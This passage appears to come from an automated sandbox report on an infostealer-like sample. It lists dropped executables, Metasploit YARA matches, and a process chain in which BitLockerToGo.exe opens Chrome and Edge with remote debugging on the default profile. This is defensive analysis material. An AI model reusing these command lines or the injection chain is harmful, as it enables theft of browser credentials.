                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1ACEC3_2_02A1ACEC
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1DC543_2_02A1DC54
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A2E5AE3_2_02A2E5AE
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A2F59B3_2_02A2F59B
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A2EDE13_2_02A2EDE1
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5DAC603_2_6C5DAC60
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6AAC303_2_6C6AAC30
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C696C003_2_6C696C00
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5CECC03_2_6C5CECC0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C62ECD03_2_6C62ECD0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C69ED703_2_6C69ED70
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6FAD503_2_6C6FAD50
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C758D203_2_6C758D20
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C75CDC03_2_6C75CDC0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5D4DB03_2_6C5D4DB0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C666D903_2_6C666D90
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C66EE703_2_6C66EE70
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6B0E203_2_6C6B0E20
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5DAEC03_2_6C5DAEC0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C670EC03_2_6C670EC0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C656E903_2_6C656E90
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C692F703_2_6C692F70
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C63EF403_2_6C63EF40
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5D6F103_2_6C5D6F10
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C710F203_2_6C710F20
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6AEFF03_2_6C6AEFF0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5D0FE03_2_6C5D0FE0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C718FB03_2_6C718FB0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5DEFB03_2_6C5DEFB0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6A48403_2_6C6A4840
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6208203_2_6C620820
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C65A8203_2_6C65A820
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6D68E03_2_6C6D68E0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6089603_2_6C608960
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6269003_2_6C626900
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6EC9E03_2_6C6EC9E0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6049F03_2_6C6049F0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6609A03_2_6C6609A0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C68A9A03_2_6C68A9A0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6909B03_2_6C6909B0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C64CA703_2_6C64CA70
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C688A303_2_6C688A30
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C67EA003_2_6C67EA00
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C64EA803_2_6C64EA80
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6D6BE03_2_6C6D6BE0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C670BA03_2_6C670BA0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5E84603_2_6C5E8460
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6344203_2_6C634420
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C65A4303_2_6C65A430
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6164D03_2_6C6164D0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C66A4D03_2_6C66A4D0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6FA4803_2_6C6FA480
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6325603_2_6C632560
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6705703_2_6C670570
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C7185503_2_6C718550
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6285403_2_6C628540
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6D45403_2_6C6D4540
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C69A5E03_2_6C69A5E0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C65E5F03_2_6C65E5F0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5C45B03_2_6C5C45B0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C62C6503_2_6C62C650
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C62E6E03_2_6C62E6E0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C66E6E03_2_6C66E6E0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5F46D03_2_6C5F46D0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6507003_2_6C650700
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5FA7D03_2_6C5FA7D0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C61E0703_2_6C61E070
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C69C0003_2_6C69C000
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6980103_2_6C698010
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5C80903_2_6C5C8090
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6AC0B03_2_6C6AC0B0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5E00B03_2_6C5E00B0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6381403_2_6C638140
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6461303_2_6C646130
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6B41303_2_6C6B4130
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5D01E03_2_6C5D01E0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6582603_2_6C658260
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6682503_2_6C668250
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6A82203_2_6C6A8220
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C69A2103_2_6C69A210
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C7562C03_2_6C7562C0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6A22A03_2_6C6A22A0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C69E2B03_2_6C69E2B0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C7123703_2_6C712370
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6EC3603_2_6C6EC360
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6663703_2_6C666370
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5D83403_2_6C5D8340
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5D23703_2_6C5D2370
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6423203_2_6C642320
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6243E03_2_6C6243E0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6023A03_2_6C6023A0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C62E3B03_2_6C62E3B0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5D3C403_2_6C5D3C40
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6F9C403_2_6C6F9C40
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5E1C303_2_6C5E1C30
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C691CE03_2_6C691CE0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C70DCD03_2_6C70DCD0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C633D003_2_6C633D00
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6A1DC03_2_6C6A1DC0
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                        Source: C:\ProgramData\AAFIJKKEHJ.exeCode function: String function: 00007FF6AD6D1394 appears 33 times
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02A0470C appears 287 times
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 6C5F3620 appears 61 times
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 6C5F9B10 appears 70 times
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02A12143 appears 34 times
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02A12265 appears 73 times
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 6C709F30 appears 31 times
                        Source: GHDAKKJJJK.exe.3.drStatic PE information: Number of sections : 12 > 10
                        Source: service.exe.54.drStatic PE information: Number of sections : 12 > 10
                        Source: AAFIJKKEHJ.exe.3.drStatic PE information: Number of sections : 11 > 10
                        Source: Updater.exe.20.drStatic PE information: Number of sections : 11 > 10
                        Source: NewApp[1].exe.3.drStatic PE information: Number of sections : 11 > 10
                        Source: Updater[1].exe.3.drStatic PE information: Number of sections : 12 > 10
                        Source: softokn3.dll.3.drStatic PE information: No import functions for PE file found
                        Source: softokn3.dll.3.drStatic PE information: Data appended to the last section found
                        Source: S0FTWARE.exe, 00000000.00000002.2234220755.0000000001E65000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs S0FTWARE.exe
                        Source: S0FTWARE.exe, 00000000.00000002.2242921904.0000000012CB6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs S0FTWARE.exe
                        Source: S0FTWARE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                        Source: 00000000.00000002.2247474253.0000000013A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                        Source: 00000000.00000002.2246493920.00000000133E8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                        Source: 00000000.00000003.2192615630.00000000133E8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                        Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@138/236@36/31
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C630300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,3_2_6C630300
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A142EE __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_02A142EE
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A133B3 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z,__EH_prolog3_catch,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,3_2_02A133B3
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\8VPLTWOR.htmJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2748:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3408:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1124:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2664:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:120:WilError_03
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                        Source: S0FTWARE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\ProgramData\AAFIJKKEHJ.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: chrome.exe, 00000005.00000002.2733717491.000007C00061E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                        Source: BitLockerToGo.exe, 00000003.00000003.2727196812.0000000002F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: S0FTWARE.exeReversingLabs: Detection: 28%
                        Source: C:\Users\user\Desktop\S0FTWARE.exeFile read: C:\Users\user\Desktop\S0FTWARE.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\S0FTWARE.exe "C:\Users\user\Desktop\S0FTWARE.exe"
                        Source: C:\Users\user\Desktop\S0FTWARE.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2324,i,17997273353640924679,7727149592954305312,262144 /prefetch:8
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
